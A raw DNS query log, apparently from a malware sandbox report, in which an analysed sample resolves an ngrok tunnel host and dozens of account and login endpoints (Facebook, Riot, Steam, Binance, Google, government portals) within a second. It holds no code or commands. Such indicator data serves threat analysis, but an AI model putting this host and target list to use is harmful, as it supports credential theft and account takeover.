                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.317708015 CET1.1.1.1192.168.2.60x1b9bNo error (0)accounts.faceit.com104.17.63.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.319205046 CET1.1.1.1192.168.2.60x5163No error (0)3fba-180-252-166-236.ngrok.io3.134.125.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.319205046 CET1.1.1.1192.168.2.60x5163No error (0)3fba-180-252-166-236.ngrok.io3.13.191.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.319205046 CET1.1.1.1192.168.2.60x5163No error (0)3fba-180-252-166-236.ngrok.io3.22.30.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.319205046 CET1.1.1.1192.168.2.60x5163No error (0)3fba-180-252-166-236.ngrok.io3.14.182.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.319205046 CET1.1.1.1192.168.2.60x5163No error (0)3fba-180-252-166-236.ngrok.io3.134.39.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.384669065 CET1.1.1.1192.168.2.60xedd7No error (0)es-la.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.384669065 CET1.1.1.1192.168.2.60xedd7No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.384669065 CET1.1.1.1192.168.2.60xedd7No error (0)star.c10r.facebook.com31.13.65.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.401915073 CET1.1.1.1192.168.2.60xafd3No error (0)rage.mp104.26.8.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.401915073 CET1.1.1.1192.168.2.60xafd3No error (0)rage.mp172.67.70.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.401915073 CET1.1.1.1192.168.2.60xafd3No error (0)rage.mp104.26.9.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.406378031 CET1.1.1.1192.168.2.60xaa09No error (0)naukrigulf.com96.7.224.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.406378031 CET1.1.1.1192.168.2.60xaa09No error (0)naukrigulf.com96.7.224.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.408277988 CET1.1.1.1192.168.2.60x6b19No error (0)ucivirtual.uci.edu.mx54.71.181.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.422190905 CET1.1.1.1192.168.2.60xbf62No error (0)money-farm.cc3.141.96.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.422190905 CET1.1.1.1192.168.2.60xbf62No error (0)money-farm.cc3.20.137.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.445377111 CET1.1.1.1192.168.2.60xd5feName error (3)sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.470688105 CET1.1.1.1192.168.2.60x7f06No error (0)midetuvelocidad.claro.com.pe200.108.110.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.518467903 CET1.1.1.1192.168.2.60xfc85No error (0)idp.uitgeverij-deviant.nl87.233.198.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.527534008 CET1.1.1.1192.168.2.60x6b44No error (0)signin.rockstargames.com104.255.105.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.527683020 CET1.1.1.1192.168.2.60xd5feName error (3)sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.533479929 CET1.1.1.1192.168.2.60x2c8No error (0)signup2.br.leagueoflegends.comsignup2.br.leagueoflegends.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.542871952 CET1.1.1.1192.168.2.60xa513Name error (3)vidcorn.tvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.565341949 CET1.1.1.1192.168.2.60x718eNo error (0)account.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.568609953 CET1.1.1.1192.168.2.60xef85No error (0)accounts.ecitizen.go.keaccounts.ecitizen.go.ke.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.586131096 CET1.1.1.1192.168.2.60x840bNo error (0)ro.bongacams.com195.85.23.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.595396996 CET1.1.1.1192.168.2.60x396aNo error (0)genshin.mihoyo.comgenshin.mihoyo.com.w.kunlunsl.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.595396996 CET1.1.1.1192.168.2.60x396aNo error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.595396996 CET1.1.1.1192.168.2.60x396aNo error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.595396996 CET1.1.1.1192.168.2.60x396aNo error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.595396996 CET1.1.1.1192.168.2.60x396aNo error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632841110 CET1.1.1.1192.168.2.60xa4e3No error (0)pan.baidu.comyiyun.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632841110 CET1.1.1.1192.168.2.60xa4e3No error (0)yiyun.n.shifen.com124.237.208.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632841110 CET1.1.1.1192.168.2.60xa4e3No error (0)yiyun.n.shifen.com36.110.192.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.647077084 CET1.1.1.1192.168.2.60x5302No error (0)hero-wars.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.660250902 CET1.1.1.1192.168.2.60xef85No error (0)accounts.ecitizen.go.keaccounts.ecitizen.go.ke.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.661582947 CET1.1.1.1192.168.2.60x626cNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com205.139.110.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com205.139.110.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com207.211.30.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com207.211.30.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com207.211.30.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com205.139.110.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663367987 CET1.1.1.1192.168.2.60xbf7eNo error (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663367987 CET1.1.1.1192.168.2.60xbf7eNo error (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663367987 CET1.1.1.1192.168.2.60xbf7eNo error (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663367987 CET1.1.1.1192.168.2.60xbf7eNo error (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663367987 CET1.1.1.1192.168.2.60xbf7eNo error (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.668576956 CET1.1.1.1192.168.2.60x3bcdNo error (0)app.plex.tv104.18.41.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.668576956 CET1.1.1.1192.168.2.60x3bcdNo error (0)app.plex.tv172.64.146.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.669662952 CET1.1.1.1192.168.2.60x5320No error (0)virtuadopt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.669662952 CET1.1.1.1192.168.2.60x5320No error (0)virtuadopt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.669662952 CET1.1.1.1192.168.2.60x5320No error (0)virtuadopt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.742346048 CET1.1.1.1192.168.2.60xe1b5No error (0)aeaaamorim.inovarmais.com104.26.14.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.742346048 CET1.1.1.1192.168.2.60xe1b5No error (0)aeaaamorim.inovarmais.com104.26.15.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.742346048 CET1.1.1.1192.168.2.60xe1b5No error (0)aeaaamorim.inovarmais.com172.67.69.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.743293047 CET1.1.1.1192.168.2.60xa4e3No error (0)pan.baidu.comyiyun.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.743293047 CET1.1.1.1192.168.2.60xa4e3No error (0)yiyun.n.shifen.com36.110.192.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.743293047 CET1.1.1.1192.168.2.60xa4e3No error (0)yiyun.n.shifen.com124.237.208.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.743315935 CET1.1.1.1192.168.2.60xb6dbNo error (0)auth.riotgames.comauth.riotgames.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.745578051 CET1.1.1.1192.168.2.60x3cf3No error (0)web.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.745578051 CET1.1.1.1192.168.2.60x3cf3No error (0)star.c10r.facebook.com31.13.65.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.749979973 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.749979973 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.749979973 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.749979973 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.751498938 CET1.1.1.1192.168.2.60x69f3No error (0)hero-wars.com18.200.3.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752387047 CET1.1.1.1192.168.2.60x8114No error (0)accounts.snapchat.comweb-gcp.api.snapchat.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752387047 CET1.1.1.1192.168.2.60x8114No error (0)web-gcp.api.snapchat.comweb-gcp.api.sc-gw.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752387047 CET1.1.1.1192.168.2.60x8114No error (0)web-gcp.api.sc-gw.com34.149.46.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752418995 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752418995 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752418995 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752418995 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.753051996 CET1.1.1.1192.168.2.60x4e2eNo error (0)accounts.google.com142.250.105.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.755140066 CET1.1.1.1192.168.2.60x736fNo error (0)accounts.binance.comd2dbdn71e1vorj.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.755140066 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.755140066 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.755140066 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.755140066 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.756198883 CET1.1.1.1192.168.2.60xa88dNo error (0)casinocontroller.com104.22.43.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.756198883 CET1.1.1.1192.168.2.60xa88dNo error (0)casinocontroller.com172.67.11.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.756198883 CET1.1.1.1192.168.2.60xa88dNo error (0)casinocontroller.com104.22.42.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.756217003 CET1.1.1.1192.168.2.60xddf5No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.756217003 CET1.1.1.1192.168.2.60xddf5No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.756217003 CET1.1.1.1192.168.2.60xddf5No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.756217003 CET1.1.1.1192.168.2.60xddf5No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.756217003 CET1.1.1.1192.168.2.60xddf5No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.757219076 CET1.1.1.1192.168.2.60xf381No error (0)phonandroid.com195.248.251.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.757219076 CET1.1.1.1192.168.2.60xf381No error (0)phonandroid.com194.169.240.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.759325027 CET1.1.1.1192.168.2.60xf52aNo error (0)contribuyente.seniat.gob.ve190.202.89.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.759325027 CET1.1.1.1192.168.2.60xf52aNo error (0)contribuyente.seniat.gob.ve190.202.2.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.759325027 CET1.1.1.1192.168.2.60xf52aNo error (0)contribuyente.seniat.gob.ve200.11.221.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.759722948 CET1.1.1.1192.168.2.60xb755No error (0)pt.secure.imvu.comsecure.imvu.sl.smartling.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.759722948 CET1.1.1.1192.168.2.60xb755No error (0)secure.imvu.sl.smartling.com54.183.63.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.759722948 CET1.1.1.1192.168.2.60xb755No error (0)secure.imvu.sl.smartling.com52.52.207.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.760572910 CET1.1.1.1192.168.2.60x32b3No error (0)warriorplus.com172.66.40.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.760572910 CET1.1.1.1192.168.2.60x32b3No error (0)warriorplus.com172.66.43.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.760591030 CET1.1.1.1192.168.2.60xcb21No error (0)steamcommunity.com23.4.32.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.760607004 CET1.1.1.1192.168.2.60xde01No error (0)authenticate.riotgames.comauthenticate.riotgames.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.760993958 CET1.1.1.1192.168.2.60x3fa4No error (0)account.booking.comdu1b3vb35hc0o.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.760993958 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.760993958 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.760993958 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.760993958 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.761575937 CET1.1.1.1192.168.2.60x482fNo error (0)mega.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.765291929 CET1.1.1.1192.168.2.60x348fNo error (0)netizion.com104.21.60.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.765291929 CET1.1.1.1192.168.2.60x348fNo error (0)netizion.com172.67.200.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.766254902 CET1.1.1.1192.168.2.60xe83aNo error (0)zarkana2.ro188.212.100.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.766345024 CET1.1.1.1192.168.2.60xe83aNo error (0)zarkana2.ro188.212.100.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.768034935 CET1.1.1.1192.168.2.60x4418No error (0)mega.nz31.216.144.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.768034935 CET1.1.1.1192.168.2.60x4418No error (0)mega.nz31.216.145.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.770087957 CET1.1.1.1192.168.2.60x242No error (0)instructory.net36.255.71.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.772392988 CET1.1.1.1192.168.2.60x9418No error (0)21dukes.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.773757935 CET1.1.1.1192.168.2.60xbcc0No error (0)mojadovera.sk104.22.74.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.773757935 CET1.1.1.1192.168.2.60xbcc0No error (0)mojadovera.sk104.22.75.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.773757935 CET1.1.1.1192.168.2.60xbcc0No error (0)mojadovera.sk172.67.9.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.775496006 CET1.1.1.1192.168.2.60xfb54No error (0)secure.vexcorp.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.775496006 CET1.1.1.1192.168.2.60xfb54No error (0)secure.vexcorp.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.775516033 CET1.1.1.1192.168.2.60x19eNo error (0)upsconline.nic.in164.100.128.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.775528908 CET1.1.1.1192.168.2.60x19eNo error (0)upsconline.nic.in164.100.128.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.777348995 CET1.1.1.1192.168.2.60x991aName error (3)tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.780071020 CET1.1.1.1192.168.2.60xf409Server failure (2)brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.781133890 CET1.1.1.1192.168.2.60x6aaeNo error (0)poligrafosecuador.com172.67.170.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.781133890 CET1.1.1.1192.168.2.60x6aaeNo error (0)poligrafosecuador.com104.21.71.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.782195091 CET1.1.1.1192.168.2.60x4d25No error (0)cloud.simplify3d.com44.233.131.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.782195091 CET1.1.1.1192.168.2.60x4d25No error (0)cloud.simplify3d.com34.208.174.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.784012079 CET1.1.1.1192.168.2.60x1093No error (0)mobilsam.com178.16.128.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.785249949 CET1.1.1.1192.168.2.60x1b2No error (0)login.adf.ly172.66.43.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.785249949 CET1.1.1.1192.168.2.60x1b2No error (0)login.adf.ly172.66.40.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.787213087 CET1.1.1.1192.168.2.60x968eNo error (0)pl-pl.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.787213087 CET1.1.1.1192.168.2.60x968eNo error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.787213087 CET1.1.1.1192.168.2.60x968eNo error (0)star.c10r.facebook.com31.13.65.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.789292097 CET1.1.1.1192.168.2.60xda7aNo error (0)ngoalongvn.com103.90.225.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.799798012 CET1.1.1.1192.168.2.60xe277No error (0)sport.autoplay.cloud104.18.32.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.799798012 CET1.1.1.1192.168.2.60xe277No error (0)sport.autoplay.cloud172.64.155.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.802048922 CET1.1.1.1192.168.2.60xc446No error (0)ag.ufa9999.com104.21.14.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.802048922 CET1.1.1.1192.168.2.60xc446No error (0)ag.ufa9999.com172.67.160.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.803963900 CET1.1.1.1192.168.2.60xadcdNo error (0)hartico.com172.67.184.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.803963900 CET1.1.1.1192.168.2.60xadcdNo error (0)hartico.com104.21.32.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.805915117 CET1.1.1.1192.168.2.60x96f3No error (0)mail.netizion.com45.43.208.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.818690062 CET1.1.1.1192.168.2.60xf26cNo error (0)transaccional.saludtotal.com.co190.216.203.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.821609020 CET1.1.1.1192.168.2.60xdaa4No error (0)api.cmrsanmartin.ziz.clcmrsanmartin.ziz.clCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.821609020 CET1.1.1.1192.168.2.60xdaa4No error (0)cmrsanmartin.ziz.cl138.197.59.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.833300114 CET1.1.1.1192.168.2.60xccc9Name error (3)app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
